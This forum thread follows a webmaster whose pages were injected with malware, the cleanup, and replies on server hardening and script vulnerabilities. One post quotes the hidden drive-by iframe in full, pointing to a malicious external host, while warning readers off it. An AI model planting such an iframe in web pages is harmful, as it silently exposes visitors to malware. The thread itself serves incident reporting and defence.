warning: check for malicious code in your webpages

[bananaman]

Looks like my site has been the target of a hacker.

I logged into Google Webmaster Tools this morning to read this:

This site may be distributing malware. Google users will see a warning page when they attempt to visit pages within this site. You can visit the Google Safe Browsing diagnostic page for your site for detailed information about the problems we found.

Sample pages that may be distributing malware:
blah blah sample webpages from my site

Please review StopBadware.org's Security Tips for Websites and make any necessary changes to your site. When you have cleaned your site, you can request a review, and we'll evaluate your site.

So I checked the source code of my index.html and homepage.html pages, and lo and behold, I found this immediately after the <body> tag:

<iframe src="http://greatnamemovie.cn:8080/ts/in.cgi?pepsi18" width=12 height=12 style="visibility: hidden"></iframe> This site is probably malicious. Obviously, DO NOT visit it.

So when visitors see my site in a search listing, they also see the Google warning "This site may harm your computer." No wonder my Google traffic dropped to almost zero overnight.

I haven't found any other pages with malicious code(but I have over 600 pages). Right now, it appears that only pages named index and homepage files are being targetted.

So check your main pages, people!

EDIT: found this info about the hack:

WordPress › Support » Did I get hacked?

[bananaman]

Oh @#$!, my Google Adsense figures jumped from:

impressions: clicks: earnings
304: 12: $1.63

to

784: 53: $10.57 in less than an hour!

And I was only average 24 clicks a day!

[jplata]

Moral of story: put malicious code in your webpages.

</joke>

[bananaman]

Well, it seems I had accidently clicked "This Month - June" from the drop down box instead of "Today", so it was giving me the total month's(yesterday + today) earnings. Doh!

Yesterday's figures were: 439: 39: $8.52
Today's figures are: 352: 15: $2.13, which seems normal, actually, a bit low.

EDIT:

Well, I cleaned the malicious code from my webpages, then requested a review by Google.

After a few hours, here is the result:

"Status of the latest badware review for this site: A review for this site has finished. The site was found clean. The badware warnings from web search are being removed. Please note that it can take some time for this change to propagate."

Yay! *dances*

[byzantium]

It looks like somebody apparently got root on the web hosting server for that Wordpress hosting service, and replaced everybody's index pages with that Chinese malware site. Hopefully Wordpress has fixed the problem. I bet that a lot of people don't even know their pages have been compromised. That's one hell of a mess for Wordpress to clean up.

[bananaman]

And the scary thing is, my site has nothing to do with wordpress. The server belongs to my ISP for it's customer's personal webpages.

And I checked my webpages this morning, and they were reinfected!

Just got a email from my ISP saying the server isn't infected, and that probably my password was compromised.

So I'll change the password and see what happens.

[PsiPro]

And the scary thing is, my site has nothing to do with wordpress. The server belongs to my ISP for it's customer's personal webpages.

And I checked my webpages this morning, and they were reinfected!

Just got a email from my ISP saying the server isn't infected, and that probably my password was compromised.

So I'll change the password and see what happens.

As a web host I get at least one of these e-mails a month.

"My virus scanner says there is a virus on your server!" or "Why is there suddenly this run bar on my website?" etc.. etc...

Just got a email from my ISP saying the server isn't infected, and that probably my password was compromised.

I can tell you 9.9999billion times out of 10billion times this is not the case. The problem is almost always an out of date commercial (or worse free) script that has a known vulnerability. The people infecting your site undoubtedly have a bot that will re-infect your site until the security hole is patched.

Now if you do not have a script, php, perl, python, whatever on your site. Another person on the server has the vulnerable script, and your host made a bad choice in configuring the server.

Your web host can do a bit to protect your sites. The first and most important thing is to run scripts under the user account. Its an easy fix and will only allow an account to damage itself, at which point the host can legitimately say you did this to yourself. Providing you do not have any world writable files (and with user executed scripts you shouldn't), your account would be safe from other accounts on the server.

The second method is a good set of Mod_Sec rules. These rules are designed to protect you from yourself. When a malicious user puts in a URL that looks suspicious (such as a SQL or CMDline injection) they will get an error page, and inevitably be blocked by the firewall.

The point of the story, update your scripts, and make sure your host is doing enough to protect you.

[byzantium]

As a web host I get at least one of these e-mails a month.

"My virus scanner says there is a virus on your server!" or "Why is there suddenly this run bar on my website?" etc.. etc...



I can tell you 9.9999billion times out of 10billion times this is not the case. The problem is almost always an out of date commercial (or worse free) script that has a known vulnerability. The people infecting your site undoubtedly have a bot that will re-infect your site until the security hole is patched.

Now if you do not have a script, php, perl, python, whatever on your site. Another person on the server has the vulnerable script, and your host made a bad choice in configuring the server.

Your web host can do a bit to protect your sites. The first and most important thing is to run scripts under the user account. Its an easy fix and will only allow an account to damage itself, at which point the host can legitimately say you did this to yourself. Providing you do not have any world writable files (and with user executed scripts you shouldn't), your account would be safe from other accounts on the server.

The second method is a good set of Mod_Sec rules. These rules are designed to protect you from yourself. When a malicious user puts in a URL that looks suspicious (such as a SQL or CMDline injection) they will get an error page, and inevitably be blocked by the firewall.

The point of the story, update your scripts, and make sure your host is doing enough to protect you.

*groan*

The Idiot Sysadmins strike again. This sort of funny business is why I am more than happy to pay Network Solutions big $$$$ for a simple webpage advertising my computer repair service. http://www.bytebustermcr.com/ Yes, they're expensive. But "cheap" is expensive in other ways. If you have a site with 600 pages, or are running an e-commerce site like most of us here, you need the best protection. I had my web designer pushing me to run my pages on his little basement server that he runs as a sideline, and I turned him down for precisely this reason.

[PsiPro]

The Idiot Sysadmins strike again.

So I'm an Idiot Sysadmin for providing user level script execution and mod_security, and running a firewall?

Edit:
I got curious and called them. Had to be escalated until I got somone who tried to answer my questions.

They don't run scripts as a user.
When I asked about mod_sec type rules he referred me to the documentation on CHMOD (that's not it)
I'm sure they run a firewall so I didn't ask.

Again the people I talked to didn't really know the answers so they may or they may provide other methods of protection

[bananaman]

So I'm an Idiot Sysadmin for providing user level script execution and mod_security, and running a firewall?

I don't think byzantium was referring to you.

Edit:
I got curious and called them. Had to be escalated until I got somone who tried to answer my questions.

They don't run scripts as a user.
When I asked about mod_sec type rules he referred me to the documentation on CHMOD (that's not it)
I'm sure they run a firewall so I didn't ask.

Who? Network solutions?

[PsiPro]

I don't think byzantium was referring to you.

Who? Network solutions?

byzantium, I know its hard to read attitude online, if I did sorry, if not I would like clarification on your comment.

Network solutions is one of the oldest hosting companies (that is still around). They are no doubt competent, but as was stated they are expensive.

[byzantium]

I had presumed that, as per bananaman's comments, that the sysadmin of his server had left an easy to hack and widely known hole open on his webserver, which is how the Chinese hacker got in. I'm no longer amused by careless sysadmins leaving gaping holes in their servers for script kiddies to drive Mack trucks through. It was a general comment. Teenage hackers trade software holes like baseball cards, and the hackers find the holes long before the white hats do, and the sysadmins are the last to figure it out, all the while some 15 year old is trashing their servers. Electronic vandalism is as nasty as real world vandalism. Bananaman's experience is like arriving home every night to find the same graffiti on your fence despite painting it over, and the cops ignoring it. You'd be frustrated too.

[The Stealthy One]

Congrats on getting it resolved. Definitely check with your Webhost. Additionally, if your site is coded in PHP or some other dynamic language, hire a security guru to check it out for any security flaws. I lost a huge file sharing site one time because some fool found a way to hack in - wasn't fun!